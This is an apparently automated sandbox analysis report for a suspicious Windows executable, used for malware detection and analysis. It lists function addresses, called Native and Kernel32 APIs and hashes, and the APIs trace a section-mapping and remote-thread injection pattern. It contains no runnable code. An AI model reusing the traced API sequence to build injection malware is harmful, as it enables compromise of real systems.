Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 172
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5

Function 02C200B4 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C200DC
Module32First.KERNEL32(00000000,00000224), ref: 02C200FC

Memory Dump Source

Source File: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c1d000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 55645f3c63a52d35b86a08a782845b75d678fbe41d9a4ab5a419f3a0bebda79d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 85F0F6311007216FE7203BF49C8DB6E72E8BF99729F100129E642914C0DF70E9495BA1

Function 0479003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0479024D

Strings

cess, xrefs: 0479018D
kernel32.dll, xrefs: 0479008F, 04790095

Memory Dump Source

Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4790000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 76e87e9080b9331b9d6418919f48ce6516a03de5705ae098c455337c6446efd4
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: A5527874A11269DFDB64CF68D984BA8BBB1BF09314F1480D9E90DAB351DB30AE84DF14

Function 004176A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2
InterlockedDecrement.KERNEL32(?), ref: 00417720

Strings

}$, xrefs: 00417727
k`, xrefs: 00417703

Memory Dump Source

Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
Instruction ID: 6a13f396818c81b553958a4f6e0fac96a639a42473e93d8a9fa1ef27fc993d3b
Opcode Fuzzy Hash: 582ae1f4cb5e6ab583fbd44bdbe7b913006fd6d65d456f2ddca9bf59cc153aa9
Instruction Fuzzy Hash: 97213330D886148BCB259F64E8857EA7B30EB49321F11487FD99A972C1CA386CD5CB9D

Function 00417050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041712F
GetProcAddress.KERNEL32(00000000,0041CF58), ref: 0041716C
VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 0041718B

Strings

, xrefs: 00417095

Memory Dump Source

Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

Function 04790E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,04790223,?,?), ref: 04790E19
SetErrorMode.KERNELBASE(00000000,?,?,04790223,?,?), ref: 04790E1E

Memory Dump Source

Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4790000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 2040e10928fc2b22c4cbe8bf78f27d5e4ccb26b170a7b7fef5909848a6b91726
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D5D0123514512877DB003AA4DC09BCD7B5CDF05B62F008011FB0DD9180C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02C1FD73 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C1FDC4

Memory Dump Source

Source File: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c1d000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 5d89c6f6f302c18c1cce2d26dd9971ee745ef06f17608fc73e5bd7995198e362
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 26112B79A00208EFDB01DF98C985E99BBF5AF08350F158094F9489B362D771EA50EF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00417020 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417684), ref: 00417028

Memory Dump Source

Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10

Non-executed Functions

Function 0479092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0479095F
l, xrefs: 04790966
GetProcAddress., xrefs: 047909DC, 047909DF, 047909E4

Memory Dump Source

Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4790000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a9c99800d58d707179825f7f9be2a6cb047888a2cbdac4757c38294d0b72f624
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 10315AB6910649DFEB10CF99D884AAEBBF9FF48324F14404AD941A7310D771FA45CBA4

Function 0040324F Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

#v, xrefs: 004032C5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: #v
API String ID: 0-4112121772
Opcode ID: b6cce00e44272c3b346c781a71a24066948c2fdd51da7417d00d6227e97d3ecb
Instruction ID: 8b342eda7a34b2dea096b61bc040758592e52e3af04c7588a1bad881e69cb651
Opcode Fuzzy Hash: b6cce00e44272c3b346c781a71a24066948c2fdd51da7417d00d6227e97d3ecb
Instruction Fuzzy Hash: D6F06DA061E281EBDB1A0F296919531BF6C6A1674733805FFD083761D2E23D4B17A25F

Function 00403256 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

#v, xrefs: 004032C5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: #v
API String ID: 0-4112121772
Opcode ID: fecb3a8a54db844415a2e1bef71f7edeaef6dd4d7564fc295dfb03336b436737
Instruction ID: 7df6671c20cba9c0b125a2c5dad59f0ef0fb370986baf59a5ee6412d0567cba0
Opcode Fuzzy Hash: fecb3a8a54db844415a2e1bef71f7edeaef6dd4d7564fc295dfb03336b436737
Instruction Fuzzy Hash: A8F0E96065D342ABDB0B0F60A9155717F5C690672732801FFE482762C5D27D0707A24F

Function 00403247 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

#v, xrefs: 004032C5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: #v
API String ID: 0-4112121772
Opcode ID: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
Instruction ID: ca511933a5b28aa85cb858a2c4f9adc3918de21c1b1b7b18f24455f842de9805
Opcode Fuzzy Hash: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
Instruction Fuzzy Hash: 30F0E2A050D282EFDB0A1F2569288317F9C6A1670733801FFD083B91C2D13E4707A25F

Function 0040326C Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

#v, xrefs: 004032C5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: #v
API String ID: 0-4112121772
Opcode ID: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
Instruction ID: 6ca54dc93712ca672dcb2052c894f69c3c01cbab2e020e50f3e64b8dc9d16c88
Opcode Fuzzy Hash: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
Instruction Fuzzy Hash: 39F0E56151D282ABDB1B4F2569550717F5C6A0770A72401FFD482B51C2E13E0717E24F

Function 00403290 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

#v, xrefs: 004032C5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: #v
API String ID: 0-4112121772
Opcode ID: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
Instruction ID: b5625208c70294fe1d85df5a918749f501d715d6cf31fdde382de861c42b0134
Opcode Fuzzy Hash: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
Instruction Fuzzy Hash: 65F02B91A1D3C15FDB631F7598191617FA86D6774931840FFD041A52D2F17E0B06D30B

Function 0040327D Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

#v, xrefs: 004032C5

Memory Dump Source

Source File: 00000000.00000002.2251676061.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: #v
API String ID: 0-4112121772
Opcode ID: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
Instruction ID: 3e9ee4a9669d4f407ff3dbfcbf3d4ca987626ae5d69e3fc9a3947ca81785133e
Opcode Fuzzy Hash: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
Instruction Fuzzy Hash: B2E0DFA064A6817BDB171F69AA190717F9C6A1BB0771801FFD081A92C2D17E0B16D34F

Function 02C1F991 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c1d000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 86c7193f59a01530c75a1ac1fe8e53853d7ec688f5c572d32e78eb4a71cdbe05
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: E8118272340200AFD744EF55DC91EA673EAFB8A320B298059ED04CB755E675EC02D760

Function 04790D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4790000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 438fb76fc780dc612a2f3caed06845426bb7ce73fcada4161f5853ee4b2e5713
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C201F7726206408FDF21DF20E804BAA33F5FB85205F0944B4E50697342E370BD418B80

Function 00417220 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00417251
WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 00417275
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041727D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004172BD
GetComputerNameW.KERNEL32(?,?), ref: 004172D1
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004172DF
OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 004172EE
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004172FF

Strings

-, xrefs: 0041730C

Memory Dump Source

Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
Instruction ID: c46b0675b47416d80202c3d70281f3f4f52baec69b8f02f40ede2316a1a36d14
Opcode Fuzzy Hash: a86f1f0194f882046147366a27b37a0b0222ba0f4a0cc77fe26ecb427af84fc1
Instruction Fuzzy Hash: 3121DB30A8430CABD7219FA0DC45BDD7B70FB0C751F1140A9FB59AA1C1CAB819C98B59

Function 00417340 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417374
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041738F
HeapDestroy.KERNEL32(00000000), ref: 004173AE
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004173BD

Memory Dump Source

Source File: 00000000.00000002.2251761482.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
Instruction ID: ae621add1e0f4e6c3d705ecf9f7467162fa1ce6b68f8d21c2afe26eea802a05a
Opcode Fuzzy Hash: d7a5cc8d7eeefd07149659bc3d851d94f0337349ccdb3bbb259457098a472d93
Instruction Fuzzy Hash: D701F7B1A442089BD750EB64ED45BEA37B8EB0C746F41006AFB09E7281DF786D84CF59

Analysis Process: fbtdajhPID: 5492, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	28.2%
Signature Coverage:	0%
Total number of Nodes:	170
Total number of Limit Nodes:	6

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
